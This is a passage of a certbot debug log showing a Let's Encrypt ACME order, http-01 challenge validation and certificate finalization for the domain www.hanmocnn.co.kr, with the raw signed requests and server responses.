|
}
|
||||||
|
2026-02-14 22:37:00,654:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 352
|
||||||
|
2026-02-14 22:37:00,655:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 201
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:37:00 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 352
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480355794976
|
||||||
|
Replay-Nonce: qLPTsdtfk80m9uZOMtD94pI3q_mEC5u6q7OKcCUpnm2-R4pTzfo
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T22:37:00Z",
|
||||||
|
"identifiers": [
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "www.hanmocnn.co.kr"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"authorizations": [
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386"
|
||||||
|
],
|
||||||
|
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480355794976"
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:00,655:DEBUG:acme.client:Storing nonce: qLPTsdtfk80m9uZOMtD94pI3q_mEC5u6q7OKcCUpnm2-R4pTzfo
|
||||||
|
2026-02-14 22:37:00,655:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 22:37:00,660:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0Zms4MG05dVpPTXREOTRwSTNxX21FQzV1NnE3T0tjQ1Vwbm0yLVI0cFR6Zm8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0",
|
||||||
|
"signature": "EBACfPJ7VkN3vjihrLhDjxuplvbL6fQ8cKAkxjykdYkUCe-LRj7aQSloC1b8jPHcUwK-NjB682PVYP5DdFNgolvdhv9XrEocveAkITYWnkkE7LT0OoQs1ZkKjt796EuNguAhfrmzNmAJLAiTnNexapEcvgu9wrlyUJl7NP6f_W1jMjw0kSzQgbwdheUgnySv0vygHIg441deXaxSUmU1EsUIVUxPFCcbE0zzWNjHT0CHfr8sQkSUDVaWZuipRHE10KbLeCYsWeYTw--Pgc0VHd66DJVJRTjZ6idGwmKm5Md0LfAAzqzGLsY5rfGdpZuFG-2bVax4bZhpfCCXq5IvvQ",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:00,838:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 826
|
||||||
|
2026-02-14 22:37:00,839:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:37:00 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 826
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: QkEzerAfss7X9qQyQnyeKwUBeoFBNPIiq6cM0QWaVf2-UORyscA
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "www.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T22:37:00Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/_Sicnw",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:00,839:DEBUG:acme.client:Storing nonce: QkEzerAfss7X9qQyQnyeKwUBeoFBNPIiq6cM0QWaVf2-UORyscA
|
||||||
|
2026-02-14 22:37:00,839:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ', 'status': 'pending', 'token': 'wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo'}
|
||||||
|
2026-02-14 22:37:00,840:INFO:certbot._internal.auth_handler:Performing the following challenges:
|
||||||
|
2026-02-14 22:37:00,840:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='www.hanmocnn.co.kr')
|
||||||
|
2026-02-14 22:37:00,840:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains.
|
||||||
|
2026-02-14 22:37:00,841:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge
|
||||||
|
2026-02-14 22:37:00,842:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo
|
||||||
|
2026-02-14 22:37:00,843:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{}'
|
||||||
|
2026-02-14 22:37:00,847:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnNzN1g5cVF5UW55ZUt3VUJlb0ZCTlBJaXE2Y00wUVdhVmYyLVVPUnlzY0EiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2L1dvcllFdyJ9",
|
||||||
|
"signature": "V9gJFKwdEeNbkiteGzJnt2imLg86cSLCFMkKmbVxzDIE9lZUZqYPJdq6U_BH45GwSAHmJGYNC4aSzFz6Axsyojnnem419sFjBw0cEF_CqDqmDkRiPOHOm4EpGxRC9fIYPPR43vXDAeGR_5o0M2CR0RAHOoqmweih8O3wYx6vsMPYUk_hDYaykd7EPNt1o7HVITqdfsAEcfRHo7D6o01egijhdDjHuzy5mwXzi88VyBNtsRm7VY4oj_14HwH-y1ehZnlFidof7FkG2drlL70uG5uoC5H7x8GaagJHDPV7xYjWm91p_ElcK5QNUngXw9sYeuMwGbTZTQEbfteif80rCg",
|
||||||
|
"payload": "e30"
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:01,026:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658763864386/WorYEw HTTP/1.1" 200 195
|
||||||
|
2026-02-14 22:37:01,027:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:37:00 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 195
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386>;rel="up"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw
|
||||||
|
Replay-Nonce: qLPTsdtfcTzEfvOVlnCkQVlTu9z3A5NW8JFOBehHtJSEWrRy7Gk
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:01,027:DEBUG:acme.client:Storing nonce: qLPTsdtfcTzEfvOVlnCkQVlTu9z3A5NW8JFOBehHtJSEWrRy7Gk
|
||||||
|
2026-02-14 22:37:01,028:INFO:certbot._internal.auth_handler:Waiting for verification...
|
||||||
|
2026-02-14 22:37:02,028:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 22:37:02,033:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZmNUekVmdk9WbG5Da1FWbFR1OXozQTVOVzhKRk9CZWhIdEpTRVdyUnk3R2siLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0",
|
||||||
|
"signature": "XXADX0L4Qrbg3ERRW4CsnjWzKwsDJUkJdZX7a9xtX3gh0KgdJGOfXkdpcx7qttBvXus85dJ7QA25ZKXLNNqARxpoJDeP9pr73ZZYYB7Fwt9wyVSQ-yreoINf6zkJbyvVWLQPIXIvty7xvwMDqhTXS1Q1A_OsPcpz8s1tYWr8pDWgzvrT7EJKSm3MUzOcZtuBqMMGlBeKwfuXmVhJCO5JADAM7gOrvRviojM5RY6XkKKUFCAn8TSQupuUKNKEYRI_zksrj6KWJdalvT5jlTLXDlfBhnjPiaT-MR_xV-_B2PAkiH1JiRGsGPHkiroCqN20WV4Ru1cDjzXybn6Q8LH6Ow",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:02,211:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 826
|
||||||
|
2026-02-14 22:37:02,212:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:37:02 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 826
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: QkEzerAfrOZM6pTRJ4EJQ8GVGPpmxiHIzMVbeb8qS9Im2CeQvr0
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "www.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T22:37:00Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/_Sicnw",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:02,212:DEBUG:acme.client:Storing nonce: QkEzerAfrOZM6pTRJ4EJQ8GVGPpmxiHIzMVbeb8qS9Im2CeQvr0
|
||||||
|
2026-02-14 22:37:02,213:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ', 'status': 'pending', 'token': 'wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo'}
|
||||||
|
2026-02-14 22:37:05,213:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 22:37:05,218:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnJPWk02cFRSSjRFSlE4R1ZHUHBteGlISXpNVmJlYjhxUzlJbTJDZVF2cjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0",
|
||||||
|
"signature": "xgjZ-8HW8sNrxs3JL8y5PoqZpwY0ieg3tRCZB1WKBlmFahkLg4oGGoVRo69CDo4Mo6XcEvbPIhhvihqxwkBjMWutSOuyrNbAGhnt70aJ8I-Mk4oQVKjvREs3FG9Lx2CjBC9CxXOJV4GKeBlalRA_kvUjqMvHcczfNWY0jREsvMlSAJPxVc982wr8oRepVP8HMCp7fXMtcIj25rD1Eq-IT68kngbRx73a6tO10Q78Qea4HVM1xGKl-OwCCjdwPIBUuSs6v8REwYjtoUBdNB6iry6Bh5TjUJGZY6KGjGYYaNtyBwjCw_zyUbWxXdQofPKcPeLUHfcN1y-K8kpri0-Bdw",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:05,396:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 826
|
||||||
|
2026-02-14 22:37:05,397:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:37:05 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 826
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: qLPTsdtf5E_tE0oZ9wXt2UihFzz5Hj2_fQraJrZY1ZcVaYjHops
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "www.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T22:37:00Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/_Sicnw",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:05,397:DEBUG:acme.client:Storing nonce: qLPTsdtf5E_tE0oZ9wXt2UihFzz5Hj2_fQraJrZY1ZcVaYjHops
|
||||||
|
2026-02-14 22:37:05,397:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ', 'status': 'pending', 'token': 'wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo'}
|
||||||
|
2026-02-14 22:37:08,398:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 22:37:08,403:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZjVFX3RFMG9aOXdYdDJVaWhGeno1SGoyX2ZRcmFKclpZMVpjVmFZakhvcHMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0",
|
||||||
|
"signature": "AWB5-r41LjGxMZKcCfb_inrjOcjW4O9dkvUox3c_KIMn5qqzDTMnymKL4ilAXge0HM_g_rbIs8gDYHFvRpGPPxLxhg66ayoYKDypjAeeK5Z2884KK8zRBAlhdS_CXny-hl-hUcTO9y9VZOTKwoT0QEKUE3N-g2qrKJkhSkN6x6zSDo1OKx_oVdiM65VwCXk0p556topXMj8iyAnuOAYkMxId-vsPYGxZVRocPofhwaxChxkfC21B8gysD57qEdfbjN8yk5nBo3IzipeZOvYlTTN8mimf5c0-4DVLnnEvpvWYxOQdTUYyrxXTuPvF-I0vrc2jh1d4h6G7H6LbI7Io3g",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:08,590:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 777
|
||||||
|
2026-02-14 22:37:08,591:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:37:08 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 777
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: QkEzerAfBWhgCrRIv-bvqdsH1Pi3gqZOHr3atrovjCPJmZbuetI
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "www.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "valid",
|
||||||
|
"expires": "2026-03-16T22:37:07Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw",
|
||||||
|
"status": "valid",
|
||||||
|
"validated": "2026-02-14T22:37:00Z",
|
||||||
|
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo",
|
||||||
|
"validationRecord": [
|
||||||
|
{
|
||||||
|
"url": "http://www.hanmocnn.co.kr/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo",
|
||||||
|
"hostname": "www.hanmocnn.co.kr",
|
||||||
|
"port": "80",
|
||||||
|
"addressesResolved": [
|
||||||
|
"222.117.41.51"
|
||||||
|
],
|
||||||
|
"addressUsed": "222.117.41.51"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:08,591:DEBUG:acme.client:Storing nonce: QkEzerAfBWhgCrRIv-bvqdsH1Pi3gqZOHr3atrovjCPJmZbuetI
|
||||||
|
2026-02-14 22:37:08,592:DEBUG:certbot._internal.error_handler:Calling registered functions
|
||||||
|
2026-02-14 22:37:08,592:INFO:certbot._internal.auth_handler:Cleaning up challenges
|
||||||
|
2026-02-14 22:37:08,592:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo
|
||||||
|
2026-02-14 22:37:08,593:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up
|
||||||
|
2026-02-14 22:37:08,593:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBKTCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE/MAxS8qM7lfOK0GC\npkjFK+Gtq7W+m3A7S1v2CpGQ0QyVjglgLTeIEDMmfz/rVDpxJMw9BjlYx3ncotfZ\nFqm+alkg1CSB8uzGmv4wVZO9YMqgq1NYmn1+3b6avJBh6JgPoDAwLgYJKoZIhvcN\nAQkOMSEwHzAdBgNVHREEFjAUghJ3d3cuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0E\nAwIDaQAwZgIxAKGLPAScVN7hS9XlaMdBbDMcfh+wj4pxQGFHZkuhZrDuevlNdKCY\n0jsVVWXbfjb5PgIxAPHhxjm8bbjXCwGTDlr+A5j+UjLbDzD0eAJAZMnr7AhEghuo\nWP+aZVUJiVAxp0Q5Iw==\n-----END CERTIFICATE REQUEST-----\n', form='pem')
|
||||||
|
2026-02-14 22:37:08,593:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-02-14 22:38:38.593873
|
||||||
|
2026-02-14 22:37:08,594:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{\n "csr": "MIIBKTCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE_MAxS8qM7lfOK0GCpkjFK-Gtq7W-m3A7S1v2CpGQ0QyVjglgLTeIEDMmfz_rVDpxJMw9BjlYx3ncotfZFqm-alkg1CSB8uzGmv4wVZO9YMqgq1NYmn1-3b6avJBh6JgPoDAwLgYJKoZIhvcNAQkOMSEwHzAdBgNVHREEFjAUghJ3d3cuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0EAwIDaQAwZgIxAKGLPAScVN7hS9XlaMdBbDMcfh-wj4pxQGFHZkuhZrDuevlNdKCY0jsVVWXbfjb5PgIxAPHhxjm8bbjXCwGTDlr-A5j-UjLbDzD0eAJAZMnr7AhEghuoWP-aZVUJiVAxp0Q5Iw"\n}'
|
||||||
|
2026-02-14 22:37:08,598:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480355794976:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZkJXaGdDclJJdi1idnFkc0gxUGkzZ3FaT0hyM2F0cm92akNQSm1aYnVldEkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzMwNjQzODY5MDYvNDgwMzU1Nzk0OTc2In0",
|
||||||
|
"signature": "iRmbifxypVg8beho7vSjGtACjPanmSlW6Od_8g-3_3CiynaNwdPlfAeyza11sHzYYzq2D7SXqGLW_5zo4mk6m1O-gbVSFrCIdsyyjm28za5gZ6f7uJaOOONmQ8LIwA58r5kF8Xe_YUO7O-ZVMuL0YetMMdvENavksjcQ4Q9QqRRTFjYOlDsl3O-H2Gzz9y-5g_gZwmPKJH4ZeQZUhiaXLNTEZ3NbdciLkdHqiMv_szkwwZiUfsrcuRD4ci3drTQqOQwFlCbP6m8twuINoFRDnMmCL5EKETp-fOxR3OGaAYhWrk7Pb4uQJRLkpfYggh1Wp2TIS24klJaYP4DfIUSh0w",
|
||||||
|
"payload": "ewogICJjc3IiOiAiTUlJQktUQ0Jyd0lCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFX01BeFM4cU03bGZPSzBHQ3BrakZLLUd0cTdXLW0zQTdTMXYyQ3BHUTBReVZqZ2xnTFRlSUVETW1mel9yVkRweEpNdzlCamxZeDNuY290ZlpGcW0tYWxrZzFDU0I4dXpHbXY0d1ZaTzlZTXFncTFOWW1uMS0zYjZhdkpCaDZKZ1BvREF3TGdZSktvWklodmNOQVFrT01TRXdIekFkQmdOVkhSRUVGakFVZ2hKM2QzY3VhR0Z1Ylc5amJtNHVZMjh1YTNJd0NnWUlLb1pJemowRUF3SURhUUF3WmdJeEFLR0xQQVNjVk43aFM5WGxhTWRCYkRNY2ZoLXdqNHB4UUdGSFprdWhackR1ZXZsTmRLQ1kwanNWVldYYmZqYjVQZ0l4QVBIaHhqbThiYmpYQ3dHVERsci1BNWotVWpMYkR6RDBlQUpBWk1ucjdBaEVnaHVvV1AtYVpWVUppVkF4cDBRNUl3Igp9"
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:09,976:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/3064386906/480355794976 HTTP/1.1" 200 454
|
||||||
|
2026-02-14 22:37:09,977:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:37:09 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 454
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480355794976
|
||||||
|
Replay-Nonce: QkEzerAfsv9nV3Qq348LLnOxB92Qa-jIqeyURxhV7CClV-KNAmg
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"status": "valid",
|
||||||
|
"expires": "2026-02-21T22:37:00Z",
|
||||||
|
"identifiers": [
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "www.hanmocnn.co.kr"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"authorizations": [
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386"
|
||||||
|
],
|
||||||
|
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480355794976",
|
||||||
|
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/06c23a86319133c2ea94bad6232b83edc89c"
|
||||||
|
}
|
||||||
|
